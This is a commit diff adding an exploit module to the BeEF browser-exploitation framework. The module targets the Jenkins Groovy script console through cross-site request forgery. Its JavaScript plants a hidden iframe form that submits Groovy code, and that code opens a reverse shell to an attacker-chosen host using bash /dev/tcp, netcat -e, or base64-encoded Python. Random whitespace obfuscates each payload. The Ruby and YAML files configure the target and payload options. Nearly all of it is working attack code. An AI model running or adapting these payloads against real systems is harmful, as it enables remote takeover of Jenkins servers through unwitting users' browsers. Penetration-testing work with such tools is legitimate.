Add Jenkins RCE CSRF

2014-11-30 05:36:47 +00:00
parent 2785dccdf0
commit 9e7f46cb8a
3 changed files with 133 additions and 0 deletions
--- a/modules/exploits/jenkins_groovy_code_exec/command.js
+++ b/modules/exploits/jenkins_groovy_code_exec/command.js
@@ -0,0 +1,68 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rproto = '<%= @rproto %>';
+  var rhost = '<%= @rhost %>';
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var target = rproto + '://' + rhost + ':' + rport + '/script';
+  var timeout = 15;
+  var payload_name = '<%= @payload %>';
+  var peer = rhost + ':' + rport;
+
+  cleanup = function() {
+    try {
+      document.body.removeChild(jenkins_groovy_code_exec_iframe_<%= @command_id %>);
+    } catch(e) {
+      beef.debug("Could not remove iframe: " + e.message);
+    }
+  } 
+  setTimeout("cleanup()", timeout*1000);
+
+  payload = function() {
+    var whitespace = '';
+    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
+    var payload = '';
+    switch (payload_name) {
+      case "reverse_python":
+        var cmd = "import socket,subprocess,os;host=\""+lhost+"\";port="+lport+";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
+        cmd = cmd.replace(/,/g, whitespace+','+whitespace).replace(/;/g, whitespace+';'+whitespace)
+        var encoded_cmd = btoa(cmd);
+        payload = 'proc = [ "/usr/bin/python" , "-c" , "exec ( \''+encoded_cmd+'\'.decode ( \'base64\' ) )" ].execute()';
+        payload = payload.replace(/ /g, whitespace);
+        break;
+      case "reverse_netcat":
+        payload = 'proc = [ "/bin/nc" , "' + lhost + '" , "' + lport + '" , "-e" , "/bin/sh" ].execute()';
+        payload = payload.replace(/ /g, whitespace);
+        break;
+      default: // "reverse_bash"
+        payload = 'proc = [ "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1" ].execute()';
+        payload = payload.replace(/ /g, whitespace);
+        break;
+    }
+    return payload
+  }
+
+  exploit = function() {
+    var groovy = payload();
+    beef.debug(peer + " - Sending payload (" + groovy.length + " bytes)");
+    var jenkins_groovy_code_exec_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded",
+    [
+      {'type':'hidden', 'name':'script', 'value':groovy },
+      {'type':'hidden', 'name':'Submit', 'value':'Run' },
+    ]);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  }
+
+  try {
+    exploit();
+  } catch(e) {
+    beef.debug(peer + " - Exploit failed: " + e.message);
+  }
+
+});
--- a/modules/exploits/jenkins_groovy_code_exec/config.yaml
+++ b/modules/exploits/jenkins_groovy_code_exec/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        jenkins_groovy_code_exec:
+            enable: true
+            category: "Exploits"
+            name: "Jenkins Code Exec CSRF"
+            description: "This module attempts to get a reverse shell from Jenkins web interface Groovy Script console. Works if the user is authenticated with console privileges or authentication is disabled."
+            authors: ["Vadodil Joel Varghese", "OSVDB-110820", "bcoles"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/jenkins_groovy_code_exec/module.rb
+++ b/modules/exploits/jenkins_groovy_code_exec/module.rb
@@ -0,0 +1,50 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Jenkins_groovy_code_exec < BeEF::Core::Command
+
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = "" if lhost == "0.0.0.0"
+    return [
+      { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
+      { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '80' },
+      { 'name' => 'rproto',
+        'type' => 'combobox',
+        'ui_label' => 'Target Protocol',
+        'store_type' => 'arraystore',
+        'store_fields' => ['rproto'],
+        'store_data' => [ ['http'], ['https'] ],
+        'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+        'valueField' => 'rproto',
+        'displayField' => 'rproto',
+        'mode' => 'local',
+        'forceSelection' => 'true',
+        'autoWidth' => true
+      },
+      { 'name' => 'payload',
+        'type' => 'combobox',
+        'ui_label' => 'Payload',
+        'store_type' => 'arraystore',
+        'store_fields' => ['payload'],
+        'store_data' => [ ['reverse_bash'], ['reverse_netcat'], ['reverse_python'] ],
+        'emptyText' => 'Select a payload',
+        'valueField' => 'payload',
+        'displayField' => 'payload',
+        'mode' => 'local',
+        'forceSelection' => 'false',
+        'autoWidth' => true
+      },
+      { 'name' => 'lhost', 'ui_label' => 'Listen Host', 'value' => lhost },
+      { 'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '8080' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end